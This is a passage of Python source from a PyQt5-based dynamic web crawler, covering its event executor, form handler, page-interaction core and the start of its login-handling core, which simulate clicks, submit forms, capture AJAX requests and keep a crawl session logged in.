| 37 | class EventExecutor(InteractionCore): 38 | 39 | def __init__(self, parent, proxy="", port=0, crawl_speed=CrawlSpeed.Medium, network_access_manager=None): 40 | super(EventExecutor, self).__init__(parent, proxy, port, crawl_speed, network_access_manager) 41 | self._url_changed = False # Inidicates if a event changes a location => treat it as link! 42 | self._new_url = None 43 | self.timeming_events = None 44 | self.none_key_events = ['click', 'focus', 'blur', 'dblclick', 'input', 'change', 45 | 'mousedown', 'mousemove', 'mouseout', 'mouseover', 'mouseup', 46 | 'resize', 'scroll', 'select', 'submit', 'load', 'unload', 'mouseleave'] 47 | self.key_events = ['keyup', 'keydown', 'keypress'] 48 | self.supported_events = self.none_key_events + self.key_events 49 | 50 | self.seen_timeouts = {} 51 | self.popup = None # reference if a popup occurs... 52 | self.mainFrame().urlChanged.connect(self._url_changes) 53 | 54 | def execute(self, webpage, timeout=5, element_to_click=None, xhr_options=XHRBehavior.ObserveXHR, pre_clicks=[]): 55 | logging.debug( 56 | "EventExecutor test started on {}...".format(webpage.url) + " with " + element_to_click.toString()) 57 | self._analyzing_finished = False 58 | self._loading_complete = False 59 | self.xhr_options = xhr_options 60 | self.element_to_click = None 61 | self.ajax_requests = [] 62 | self._new_url = None 63 | self.timeming_events = None 64 | self._capturing_ajax = False 65 | self._new_clickables = [] 66 | self.element_to_click = element_to_click 67 | self.popup = None 68 | self.mainFrame().setHtml(webpage.html, QUrl(webpage.url)) 69 | target_tag = element_to_click.dom_address.split("/") 70 | target_tag = target_tag[-1] 71 | if target_tag in ['video']: 72 | return EventResult.UnsupportedTag, None 73 | 74 | t = 0.0 75 | while (not self._loading_complete and t < timeout ): # Waiting for finish processing 76 | self._wait(0.1) 77 | t += 0.1 78 | if not self._loading_complete: 79 | logging.debug("Timeout occurs while initial page loading...") 80 | return EventResult.ErrorWhileInitialLoading, None 81 | # Prepare Page for clicking... 82 | self._wait(0.1) 83 | for click in pre_clicks: 84 | pre_click_elem = None 85 | logging.debug("Click on: " + click.toString()) 86 | if click.id != None and click.id != "": 87 | pre_click_elem = self.search_element_with_id(click.id) 88 | if click.html_class != None and pre_click_elem == None: 89 | pre_click_elem = self.search_element_with_class(click.html_class, click.dom_address) 90 | if pre_click_elem == None: 91 | pre_click_elem = self.search_element_without_id_and_class(click.dom_address) 92 | 93 | if pre_click_elem is None: 94 | logging.debug("Preclicking element not found") 95 | return EventResult.PreviousClickNotFound, None 96 | 97 | if "javascript:" not in click.event: 98 | js_code = click.event 99 | if js_code[0:2] == "on": 100 | js_code = js_code[2:] # if event beginns with on, escape it 101 | js_code = "Simulate." + js_code + "(this);" 102 | pre_click_elem.evaluateJavaScript(js_code) # Waiting for finish processing 103 | else: 104 | pre_click_elem.evaluateJavaScript(click.event[len("javascript:"):]) 105 | self._wait(self.wait_for_event) 106 | 107 | is_key_event = False 108 | # Now execute the target event 109 | if "javascript:" not in element_to_click.event: 110 | self._url_changed = False 111 | js_code = element_to_click.event 112 | if js_code[0:2] == "on": 113 | js_code = js_code[2:] # if event begins with on, escape it 114 | 115 | if js_code in self.key_events: 116 | is_key_event = True 117 | random_char = random.choice(string.ascii_letters) 118 | js_code = "Simulate." + js_code + "(this, '" + random_char + "');" 119 | else: 120 | js_code = "Simulate." + js_code + "(this);" 121 | else: 122 | js_code = element_to_click.event[len("javascript:"):] 123 | 124 | self.mainFrame().evaluateJavaScript( 125 | self._addEventListener) # This time it is here, because I dont want to have the initial addings 126 | 127 | real_clickable = None 128 | if element_to_click.id != None and element_to_click.id != "": 129 | real_clickable = self.search_element_with_id(element_to_click.id) 130 | if element_to_click.html_class != None and real_clickable == None: 131 | real_clickable = self.search_element_with_class(element_to_click.html_class, element_to_click.dom_address) 132 | if real_clickable == None: 133 | real_clickable = self.search_element_without_id_and_class(element_to_click.dom_address) 134 | 135 | if real_clickable is None: 136 | logging.debug("Target Clickable not found") 137 | return EventResult.TargetElementNotFound, None 138 | 139 | self._capturing_ajax = True 140 | real_clickable.evaluateJavaScript(js_code) 141 | self._wait(0.5) 142 | self._capturing_ajax = False 143 | links, clickables = extract_links(self.mainFrame(), webpage.url) 144 | 145 | forms = extract_forms(self.mainFrame()) 146 | elements_with_event_properties = property_helper(self.mainFrame()) 147 | self.mainFrame().evaluateJavaScript(self._property_obs_js) 148 | self._wait(0.1) 149 | 150 | html = self.mainFrame().toHtml() 151 | url = self.mainFrame().url().toString() 152 | 153 | if is_key_event: 154 | generator = KeyClickable(element_to_click, random_char) 155 | else: 156 | generator = element_to_click 157 | if self._url_changed and self._new_url.toString() != webpage.url: 158 | delta_page = DeltaPage(-1, self._new_url.toString(), html=None, generator=generator, parent_id=webpage.id, 159 | cookiesjar=webpage.cookiejar) 160 | self._analyzing_finished = True 161 | self.mainFrame().setHtml(None) 162 | return EventResult.URLChanged, delta_page 163 | elif self.popup is not None: 164 | logging.debug("Event creates Popup with Url: {}".format(self.popup.mainFrame().url().toString())) 165 | popup_url = self.popup.mainFrame().url().toString() 166 | delta_page = DeltaPage(-1, popup_url, html=None, generator=generator, parent_id=webpage.id) 167 | self.popup = None 168 | self._analyzing_finished = True 169 | self.mainFrame().setHtml(None) 170 | return EventResult.CreatesPopup, delta_page 171 | else: 172 | delta_page = DeltaPage(-1, webpage.url, html, generator=generator, parent_id=webpage.id, 173 | cookiesjar=webpage.cookiejar) 174 | delta_page.clickables = self._new_clickables # Set by add eventlistener code 175 | delta_page.clickables.extend(clickables) 176 | delta_page.clickables.extend(elements_with_event_properties) 177 | delta_page.clickables = purge_dublicates(delta_page.clickables) 178 | try: 179 | delta_page.clickables.remove(self.element_to_click) # remove the clickable self... 180 | except ValueError: 181 | pass 182 | delta_page.links = links 183 | delta_page.forms = forms 184 | delta_page.ajax_requests = self.ajax_requests 185 | self._analyzing_finished = True 186 | self.mainFrame().setHtml(None) 187 | return EventResult.Ok, delta_page 188 | 189 | def javaScriptAlert(self, frame, msg): 190 | logging.debug("Alert occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg)) 191 | 192 | def javaScriptConfirm(self, frame, msg): 193 | logging.debug("Confirm occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg)) 194 | return True 195 | 196 | def loadFinishedHandler(self, result): 197 | if not self._analyzing_finished: # Just to ignoring setting of non page.... 198 | self._loading_complete = True 199 | 200 | def jsWinObjClearedHandler(self): # Adding here the js-scripts corresponding to the phases 201 | if not self._analyzing_finished: 202 | self.mainFrame().evaluateJavaScript(self._lib_js) 203 | self.mainFrame().evaluateJavaScript(self._md5) 204 | self.mainFrame().addToJavaScriptWindowObject("jswrapper", self._js_bridge) 205 | if self.xhr_options == XHRBehavior.ObserveXHR: 206 | self.mainFrame().evaluateJavaScript(self._xhr_observe_js) 207 | if self.xhr_options == XHRBehavior.InterceptXHR: 208 | self.mainFrame().evaluateJavaScript(self._xhr_interception_js) 209 | 210 | def createWindow(self, win_type): 211 | logging.debug("Creating new window...{}".format(win_type)) 212 | 213 | def capturing_requests(self, request): 214 | if self._capturing_ajax: 215 | logging.debug("Ajax to: {} captured...".format(request['url'])) 216 | ajax_request = AjaxRequest(request['method'], request['url'], self.element_to_click, request['parameters']) 217 | if ajax_request not in self.ajax_requests: 218 | self.ajax_requests.append(ajax_request) 219 | 220 | def javaScriptConsoleMessage(self, message, lineNumber, sourceID): 221 | logging.debug("Console(EventExecutor): " + message + " at: " + str(lineNumber)) 222 | pass 223 | 224 | def capture_timeout_call(self, timingevent): 225 | try: 226 | # logging.debug(timingevent) 227 | if timingevent['time'] != "undefined": 228 | time = timingevent['time'] # millisecond 229 | event_type = timingevent['type'] 230 | event_id = timingevent['function_id'] 231 | if self.timeming_events is not None: 232 | if time > self.timeming_events[0]: 233 | self.timeming_events = (time, event_type, event_id) 234 | else: 235 | self.timeming_events = (time, event_type, event_id) 236 | except KeyError as err: 237 | logging.debug("Key error occurred in Events " + str(err)) 238 | 239 | 240 | def _url_changes(self, url): 241 | self._url_changed = True 242 | self._new_url = url 243 | 244 | def createWindow(self, webWindowType): 245 | self.popup = QWebPage() 246 | return self.popup 247 | 248 | 249 | class EventResult(Enum): 250 | Ok = 0 251 | PreviousClickNotFound = 1 252 | TargetElementNotFound = 2 253 | ErrorWhileInitialLoading = 3 254 | URLChanged = 4 255 | UnsupportedTag = 5 256 | CreatesPopup = 6 257 | -------------------------------------------------------------------------------- /crawler/core/formhandler.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | import logging 19 | 20 | from PyQt5.Qt import QUrl 21 | 22 | from core.interactioncore import InteractionCore 23 | from core.eventexecutor import EventResult 24 | from analyzer.helper.formhelper import extract_forms 25 | from analyzer.helper.linkhelper import extract_links 26 | from models.clickable import Clickable 27 | from models.utils import CrawlSpeed, purge_dublicates 28 | 29 | __author__ = 'constantin' 30 | 31 | 32 | class FormHandler(InteractionCore): 33 | 34 | 35 | def __init__(self, parent, proxy = "", port = 0, crawl_speed = CrawlSpeed.Medium, network_access_manager = None): 36 | super(FormHandler, self).__init__(parent, proxy, port, crawl_speed, network_access_manager) 37 | #self.mainFrame().urlChanged.connect(self._url_changes) 38 | 39 | def submit_form(self, form, webpage, data=dict(), timeout=5): 40 | logging.debug("FormHandler on Page: {} started...".format(webpage.url)) 41 | self._loading_complete = False 42 | self._analyzing_finished = False 43 | try: 44 | url = webpage.url.toString() 45 | except AttributeError: 46 | url = webpage.url 47 | self.mainFrame().setHtml(webpage.html, QUrl(url)) 48 | self._new_clickables = [] 49 | 50 | t = 0.0 51 | while not self._loading_complete and t < timeout: # Waiting for finish processing 52 | self._wait(0.1) 53 | t += 0.1 54 | if not self._loading_complete: 55 | logging.debug("Timeout occurs while initial page loading...") 56 | return EventResult.ErrorWhileInitialLoading, None 57 | 58 | target_form = None 59 | p_forms = self.mainFrame().findAllElements("form") 60 | for tmp_form in p_forms: 61 | path = tmp_form.evaluateJavaScript("getXPath(this)") 62 | if path == form.dom_address: 63 | target_form = tmp_form 64 | break 65 | if target_form is None: 66 | return EventResult.TargetElementNotFound, None 67 | 68 | for elem in form.parameter: #Iterate through abstract form representation 69 | if elem.name in data: #Check if we have the data we must set 70 | elem_found = False # Indicates if we found the element in the html 71 | value_to_set = data[elem.name] 72 | for tmp in target_form.findAll(elem.tag): #Locking in the target form, if we found the element we have to set 73 | if tmp.attribute("name") == elem.name: # Has the current element in the html the same name as our data 74 | tmp.evaluateJavaScript("this.value = '" + value_to_set + "';") 75 | elem_found = True 76 | break 77 | if not elem_found: 78 | return EventResult.TargetElementNotFound, None 79 | # Now we should have set all known parameters, next click the submit button 80 | q_submit_button = None 81 | if "submit" in form.toString(): 82 | inputs = target_form.findAll("input") + target_form.findAll("button") 83 | for el in inputs: 84 | if el.attribute("type") == "submit": 85 | q_submit_button = el 86 | break 87 | #q_submit_button.evaluateJavaScript("this.id='oxyfrymbel'") 88 | else: 89 | logging.debug(form.toString()) 90 | 91 | if q_submit_button is None: 92 | inputs = target_form.findAll("button") 93 | q_submit_button = None 94 | if len(inputs) > 1: 95 | logging.debug("Cannot locate login button...") 96 | return EventResult.TargetElementNotFound, None 97 | elif len(inputs) == 1: 98 | q_submit_button = inputs[0] 99 | 100 | method = target_form.attribute("onsubmit") 101 | if method is not None and method != "": 102 | js_code_snippets = method.split(";") 103 | for snippet in js_code_snippets: 104 | if "return" in snippet or snippet == "": 105 | logging.debug("Ignoring snippet: {}".format(snippet)) 106 | continue 107 | logging.debug("Eval: {}".format(snippet+";")) 108 | self.mainFrame().evaluateJavaScript(snippet+";") 109 | self._wait(3) 110 | self.mainFrame().evaluateJavaScript(self._addEventListener) 111 | self._wait(3) 112 | else: 113 | #TODO: Implement way for sending forms without onsubmit-method 114 | # check between: target_form.evaluateJavaScript("Simulate or document.?form?.submit()) 115 | # or submit_button click 116 | if q_submit_button is not None: 117 | logging.debug("Click on submit button...") 118 | q_submit_button.evaluateJavaScript("Simulate.click(this);") 119 | self._wait(3) 120 | else: 121 | logging.debug("Trigger submit event on form...") 122 | target_form.evaluateJavaScript("Simulate.submit(this);") 123 | self._wait(3) 124 | 125 | links, clickables = extract_links(self.mainFrame(), url) 126 | forms = extract_forms(self.mainFrame()) 127 | html = self.mainFrame().toHtml() 128 | #f = open("html.txt", "w") 129 | #f.write(html) 130 | #f.close() 131 | self.mainFrame().setHtml(None) 132 | self._new_clickables.extend(clickables) 133 | self._new_clickables = purge_dublicates(self._new_clickables) 134 | return EventResult.Ok, html, self._new_clickables, forms, links, [] 135 | 136 | def jsWinObjClearedHandler(self): #Adding here the js-scripts corresponding to the phases 137 | if not self._analyzing_finished: 138 | self.mainFrame().evaluateJavaScript(self._lib_js) 139 | self.mainFrame().evaluateJavaScript(self._md5) 140 | self.mainFrame().addToJavaScriptWindowObject("jswrapper", self._js_bridge) 141 | 142 | def javaScriptConsoleMessage(self, message, lineNumber, sourceID): 143 | #logging.debug("Console(FormHandler): " + message + " at: " + str(lineNumber)) 144 | pass 145 | 146 | def javaScriptAlert(self, frame, msg): 147 | logging.debug("Alert occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg)) 148 | 149 | def javaScriptConfirm(self, frame, msg): 150 | logging.debug("Confirm occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg)) 151 | return True 152 | 153 | def loadFinishedHandler(self, result): 154 | if not self._analyzing_finished: # Just to ignoring setting of non page.... 155 | self._loading_complete = True 156 | -------------------------------------------------------------------------------- /crawler/core/interactioncore.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | 19 | from PyQt5.Qt import QWebPage, QWebSettings 20 | from PyQt5.QtNetwork import QNetworkProxy, QNetworkRequest 21 | from PyQt5.QtCore import QSize, QUrl, QByteArray 22 | 23 | from time import time, sleep 24 | from core.jsbridge import JsBridge 25 | from models.clickable import Clickable 26 | from models.utils import CrawlSpeed 27 | import logging 28 | 29 | class InteractionCore(QWebPage): 30 | ''' 31 | This is the main class for interacting with a webpage, here are all necessary js-files loaded, and signal connections build 32 | ''' 33 | def __init__(self, parent, proxy = "", port = 0, crawl_speed = CrawlSpeed.Medium, network_access_manager = None): 34 | QWebPage.__init__(self, parent) 35 | self.app = parent.app 36 | self._js_bridge = JsBridge(self) 37 | self.loadFinished.connect(self.loadFinishedHandler) 38 | self.mainFrame().javaScriptWindowObjectCleared.connect(self.jsWinObjClearedHandler) 39 | self.frameCreated.connect(self.frameCreatedHandler) 40 | self.setViewportSize(QSize(1024, 800)) 41 | 42 | if crawl_speed == CrawlSpeed.Slow: 43 | self.wait_for_processing = 1 44 | self.wait_for_event = 2 45 | if crawl_speed == CrawlSpeed.Medium: 46 | self.wait_for_processing = 0.3 47 | self.wait_for_event = 1 48 | if crawl_speed == CrawlSpeed.Fast: 49 | self.wait_for_processing = 0.1 50 | self.wait_for_event = 0.5 51 | if crawl_speed == CrawlSpeed.Speed_of_Lightning: 52 | self.wait_for_processing = 0.01 53 | self.wait_for_event = 0.1 54 | 55 | f = open("js/lib.js", "r") 56 | self._lib_js = f.read() 57 | f.close() 58 | 59 | f = open("js/ajax_observer.js") 60 | self._xhr_observe_js = f.read() 61 | f.close() 62 | 63 | f = open("js/timing_wrapper.js") 64 | self._timeming_wrapper_js = f.read() 65 | f.close() 66 | 67 | 68 | f = open("js/ajax_interceptor.js") 69 | self._xhr_interception_js = f.read() 70 | f.close() 71 | 72 | f = open("js/addeventlistener_wrapper.js") 73 | self._addEventListener = f.read() 74 | f.close() 75 | 76 | f = open("js/md5.js") 77 | self._md5 = f.read() 78 | f.close() 79 | 80 | f = open("js/property_obs.js") 81 | self._property_obs_js = f.read() 82 | f.close() 83 | 84 | enablePlugins = True 85 | loadImages = False 86 | self.settings().setAttribute(QWebSettings.PluginsEnabled, enablePlugins) 87 | self.settings().setAttribute(QWebSettings.JavaEnabled, enablePlugins) 88 | #self.settings().setAttribute(QWebSettings.AutoLoadImages, loadImages) 89 | self.settings().setAttribute(QWebSettings.DeveloperExtrasEnabled, True) 90 | self.settings().setAttribute(QWebSettings.JavascriptEnabled, True) 91 | self.settings().setAttribute(QWebSettings.JavascriptCanOpenWindows, True) 92 | 93 | if network_access_manager: 94 | self.setNetworkAccessManager(network_access_manager) 95 | 96 | if proxy != "" and port != 0: 97 | manager = self.networkAccessManager() 98 | p = QNetworkProxy(QNetworkProxy.HttpProxy, proxy, port, None, None) 99 | manager.setProxy(p) 100 | self.setNetworkAccessManager(manager) 101 | 102 | #Have to connect it here, otherwise I could connect it to the old one and then replaces it 103 | self.networkAccessManager().finished.connect(self.loadComplete) 104 | 105 | def analyze(self, html, requested_url, timeout = 20): 106 | raise NotImplemented() 107 | 108 | def userAgentForUrl(self, url): 109 | return "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 110 | 111 | def loadFinishedHandler(self, result): 112 | pass 113 | 114 | def frameCreatedHandler(self, frame): 115 | pass 116 | 117 | def jsWinObjClearedHandler(self): 118 | pass 119 | 120 | def javaScriptAlert(self, frame, msg): 121 | pass 122 | 123 | def javaScriptConfirm(self, frame, msg): 124 | return True 125 | 126 | def javaScriptPrompt(self, *args, **kwargs): 127 | return True 128 | 129 | def _wait(self, waiting_time=1): 130 | """Wait for delay time 131 | """ 132 | deadline = time() + waiting_time 133 | while time() < deadline: 134 | sleep(0) 135 | self.app.processEvents() 136 | 137 | def javaScriptConsoleMessage(self, message, lineNumber, sourceID): 138 | #logging.debug("Console: " + message + " at: " + str(lineNumber)) 139 | pass 140 | 141 | def loadComplete(self, reply): 142 | pass 143 | 144 | def add_eventlistener_to_element(self, msg): 145 | #logging.debug(msg) 146 | if "id" in msg and msg['id'] != "": 147 | id = msg['id'] 148 | else: 149 | id = None 150 | dom_address = msg['addr'] 151 | event = msg['event'] 152 | if event == "": 153 | event = None 154 | tag = msg['tag'] 155 | if "class" in msg and msg['class'] != "": 156 | html_class = msg['class'] 157 | else: 158 | html_class = None 159 | function_id = msg['function_id'] 160 | if tag is not None and dom_address != "": 161 | tmp = Clickable(event, tag, dom_address, id, html_class, function_id=function_id) 162 | if tmp not in self._new_clickables: 163 | self._new_clickables.append(tmp) 164 | 165 | 166 | def search_element_with_id(self, element_id): 167 | elem = self.mainFrame().findAllElements("#" + str(element_id)) 168 | if len(elem) > 0: 169 | return elem[0] # maybe check if there is more than one element 170 | else: 171 | return None 172 | 173 | def search_element_with_class(self, cls, dom_adress): 174 | css_cls_definition = "" 175 | classes = cls.split(" ") 176 | for cls in classes: #converting class names in css-compatible classnames 177 | cls = "." + cls 178 | css_cls_definition = css_cls_definition + cls + " " 179 | elems = self.mainFrame().findAllElements(css_cls_definition) 180 | for elem in elems: 181 | if dom_adress == elem.evaluateJavaScript("getXPath(this)"): 182 | return elem 183 | 184 | def search_element_without_id_and_class(self, dom_adress): 185 | check_dom_adress = dom_adress 186 | dom_address = dom_adress.split("/") 187 | current_element_in_dom = self.mainFrame().documentElement() #Is HTML-Element 188 | while len(dom_address) > 0 and current_element_in_dom is not None: 189 | target_tag_name = dom_address.pop(0) # Get and remove the first element 190 | target_tag_name = target_tag_name.upper() 191 | if len(target_tag_name) == 0: 192 | continue 193 | elif target_tag_name == "HTML": #or target_tag_name == "body": 194 | continue 195 | else: 196 | tmp = target_tag_name.find("[") 197 | if tmp > 0: # target_tag_name looks like tagname[index] 198 | target_tag_name = target_tag_name.split("[") 199 | index = int(target_tag_name[1].split("]")[0]) # get index out of target_tag_name 200 | target_tag_name = target_tag_name[0] # target_tag_name name 201 | last_child = current_element_in_dom.lastChild() 202 | tmp_element = current_element_in_dom.findFirst(target_tag_name) # takes first child 203 | if tmp_element.tagName() == target_tag_name: # if firstchild is from type of target_tag_name, subtrakt 1 from index 204 | index -= 1; 205 | counter = 100 #Sometimes comparing with last child went wrong, therefore we have an backup fragment_counter 206 | while index > 0 and tmp_element != last_child: # take next sibbling until index is 0, if target_tag_name is equal subtrakt one 207 | tmp_element = tmp_element.nextSibling() # 208 | if tmp_element.tagName() == target_tag_name: 209 | index -= 1 210 | counter -= 1 211 | if counter == 0: #If fragment_counter 0 then break, we wont find it anymore 212 | current_element_in_dom = None 213 | break 214 | if index == 0 and tmp_element.tagName() == target_tag_name: 215 | current_element_in_dom = tmp_element 216 | else: #We miss the element 217 | current_element_in_dom = None 218 | else: #target_tag_name is the only of his type, or the first...is die hell 219 | tmp_element = current_element_in_dom.firstChild() 220 | last_child = current_element_in_dom.lastChild() 221 | counter = 100 222 | while tmp_element.tagName() != target_tag_name and tmp_element != last_child and counter > 0: 223 | #logging.debug(tmp_element.tagName()) 224 | counter -= 1 225 | if tmp_element.tagName() == target_tag_name: 226 | current_element_in_dom = tmp_element 227 | break 228 | else: 229 | tmp_element = tmp_element.nextSibling() 230 | if tmp_element.tagName() != target_tag_name or counter == 0: 231 | current_element_in_dom = None 232 | else: 233 | current_element_in_dom = tmp_element 234 | 235 | tmp_element = None 236 | last_child = None 237 | dom_address = None 238 | 239 | if current_element_in_dom == None: 240 | return None 241 | if current_element_in_dom.evaluateJavaScript("getXPath(this)") != check_dom_adress: 242 | logging.debug("Element not found: " + str(current_element_in_dom.evaluateJavaScript("getXPath(this)")) + " : " + str(check_dom_adress)) 243 | return None 244 | else: 245 | return current_element_in_dom 246 | 247 | 248 | def make_request(self, url): 249 | request = QNetworkRequest() 250 | request.setUrl(QUrl(url)) 251 | return request 252 | 253 | def post_data_to_array(self, post_data): 254 | post_params = QByteArray() 255 | for (key, value) in post_data.items(): 256 | if isinstance(value, list): 257 | for val in value: 258 | post_params.append(key + "=" + val + "&") 259 | else: 260 | post_params.append(key + "=" + value + "&") 261 | post_params.remove(post_params.length() - 1, 1) 262 | return post_params -------------------------------------------------------------------------------- /crawler/core/jaekcore.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | from asyncio.tasks import sleep 19 | import logging 20 | from PyQt5.Qt import QApplication, QObject 21 | from PyQt5.QtNetwork import QNetworkAccessManager 22 | import sys 23 | from copy import deepcopy 24 | from analyzer.mainanalyzer import MainAnalyzer 25 | from core.eventexecutor import EventResult, EventExecutor 26 | from core.formhandler import FormHandler 27 | from models.webpage import WebPage 28 | from utils.asyncrequesthandler import AsyncRequestHandler 29 | from utils.execptions import LoginFailed 30 | from utils.utils import count_cookies, calculate_similarity_between_pages 31 | 32 | __author__ = 'constantin' 33 | 34 | class JaekCore(QObject): 35 | 36 | 37 | def __init__(self, config, proxy="", port=0, database_manager=None): 38 | QObject.__init__(self) 39 | self.app = QApplication(sys.argv) 40 | self._network_access_manager = QNetworkAccessManager(self) 41 | self.user = None 42 | self.proxy = proxy 43 | self.port = port 44 | self.config = config 45 | self.database_manager = database_manager 46 | self.domain_handler = None 47 | self.process_with_login = False 48 | self.async_request_handler = AsyncRequestHandler(self.database_manager) 49 | 50 | self._event_executor = EventExecutor(self, proxy, port, crawl_speed=config.process_speed, 51 | network_access_manager=self._network_access_manager) 52 | self._dynamic_analyzer = MainAnalyzer(self, proxy, port, crawl_speed=config.process_speed, 53 | network_access_manager=self._network_access_manager) 54 | self._form_handler = FormHandler(self, proxy, port, crawl_speed=config.process_speed, 55 | network_access_manager=self._network_access_manager) 56 | 57 | self.cookie_num = -1 58 | self.interactive_login_form_search = False 59 | 60 | def _find_form_with_special_parameters(self, page, login_data, interactive_search=True): 61 | keys = list(login_data.keys()) 62 | data1 = keys[0] 63 | data2 = keys[1] 64 | for form in page.forms: 65 | if form.toString().find(data1) > -1 and form.toString().find(data2) > -1: 66 | return form, None 67 | if interactive_search: 68 | for clickable in page.clickables: 69 | tmp_page = deepcopy(page) 70 | event_state, delta_page = self._event_executor.execute(tmp_page, element_to_click=clickable) 71 | if delta_page is None: 72 | sleep(2000) 73 | event_state, delta_page = self._event_executor.execute(tmp_page, element_to_click=clickable) 74 | if delta_page is None: 75 | continue 76 | delta_page = self.domain_handler.complete_urls_in_page(delta_page) 77 | delta_page = self.domain_handler.analyze_urls(delta_page) 78 | if event_state == EventResult.Ok: 79 | for form in delta_page.forms: 80 | if form.toString().find(data1) > -1 and form.toString().find(data2) > -1: 81 | return form, clickable 82 | return None, None 83 | 84 | def _initial_login(self): 85 | logging.debug("Initial Login...") 86 | self._page_with_loginform_logged_out = self._get_webpage(self.user.url_with_login_form) 87 | num_of_cookies_before_login = count_cookies(self._network_access_manager, self.user.url_with_login_form) 88 | logging.debug("Number of cookies before initial login: {}".format(num_of_cookies_before_login)) 89 | self._login_form, login_clickables = self._find_form_with_special_parameters(self._page_with_loginform_logged_out, self.user.login_data) 90 | if self._login_form is None: 91 | f = open("No_login_form.txt", "w") 92 | f.write(self._page_with_loginform_logged_out.html) 93 | f.close() 94 | raise LoginFailed("Cannot find Login form, please check the parameters...") 95 | 96 | page_after_login = self._login_and_return_webpage(self._login_form, self._page_with_loginform_logged_out, self.user.login_data, login_clickables) 97 | if page_after_login is None: 98 | raise LoginFailed("Cannot load loginpage anymore...stop...") 99 | login_successfull = calculate_similarity_between_pages(self._page_with_loginform_logged_out, page_after_login) < 0.5 100 | if login_successfull: 101 | num_cookies_after_login = count_cookies(self._network_access_manager, self.user.url_with_login_form) 102 | if num_cookies_after_login > num_of_cookies_before_login: 103 | self.cookie_num = num_cookies_after_login 104 | logging.debug("Initial login successfull!") 105 | if login_clickables is not None: 106 | return True, True # If we login with a click 107 | else: 108 | return True, False # If we don't login with a click 109 | raise LoginFailed("Cannot login, sorry...") 110 | 111 | def _login_and_return_webpage(self, login_form, page_with_login_form=None, login_data=None, login_clickable= None): 112 | if page_with_login_form is None: 113 | page_with_login_form = self._page_with_loginform_logged_out 114 | try: 115 | if login_clickable is not None: 116 | tmp_page = deepcopy(page_with_login_form) 117 | event_state, page_with_login_form = self._event_executor.execute(tmp_page, element_to_click=login_clickable) 118 | if event_state == EventResult.ErrorWhileInitialLoading: 119 | sleep(2000) 120 | event_state, page_with_login_form = self._event_executor.execute(tmp_page, element_to_click=login_clickable) 121 | if event_state == EventResult.ErrorWhileInitialLoading: 122 | logging.debug("Two time executing fails.. stop crawling") 123 | return None 124 | self.domain_handler.complete_urls_in_page(page_with_login_form) 125 | self.domain_handler.analyze_urls(page_with_login_form) 126 | self.async_request_handler.handle_requests(page_with_login_form) 127 | logging.debug("Start submitting login form...") 128 | response_code, html_after_timeouts, new_clickables, forms, links, timemimg_requests = self._form_handler.submit_form(login_form, page_with_login_form, login_data) 129 | except ValueError: 130 | return None 131 | #TODO: Put building of Webpage inside submit function 132 | page_after_login = WebPage(-1, page_with_login_form.url, html_after_timeouts) 133 | page_after_login.clickables = new_clickables 134 | page_after_login.links = links 135 | page_after_login.timing_requests = timemimg_requests 136 | page_after_login.forms = forms 137 | self.domain_handler.complete_urls_in_page(page_after_login) 138 | self.domain_handler.analyze_urls(page_after_login) 139 | self.async_request_handler.handle_requests(page_after_login) 140 | return page_after_login 141 | 142 | def _handle_possible_logout(self): 143 | """ 144 | Handles a possible logout 145 | :return: True is we were not logged out and false if we were logged out 146 | """ 147 | retries = 0 148 | max_retries = 3 149 | while retries < max_retries: 150 | logging.debug("Start with relogin try number: {}".format(retries+1)) 151 | page_with_login_form = self._get_webpage(self.user.url_with_login_form) 152 | login_form, login_clickable = self._find_form_with_special_parameters(page_with_login_form, self.user.login_data, self.interactive_login_form_search) 153 | if login_form is not None: 154 | #So login_form is visible, we are logged out 155 | logging.debug("Logout detected, visible login form...") 156 | hopefully_reloggedin_page = self._login_and_return_webpage(login_form, page_with_login_form, self.user.login_data, login_clickable) 157 | if hopefully_reloggedin_page is None: 158 | retries += 1 159 | logging.debug("Relogin attempt number {} failed".format(retries)) 160 | sleep(2000) 161 | else: 162 | login_form, login_clickable = self._find_form_with_special_parameters(hopefully_reloggedin_page, self.user.login_data) 163 | if login_form is None: 164 | logging.debug("Relogin successfull...continue") 165 | return False 166 | else: 167 | logging.debug("Relogin fails, loginform is still present...") 168 | retries += 1 169 | sleep(2000) 170 | else: 171 | logging.debug("Login form is not there... we can continue (I hope)") 172 | if retries < 3: 173 | return True 174 | else: 175 | return False 176 | raise LoginFailed("We cannot login anymore... stop crawling here") 177 | 178 | 179 | def _get_webpage(self, url): 180 | response_code, result = self._dynamic_analyzer.analyze(url, timeout=10) 181 | 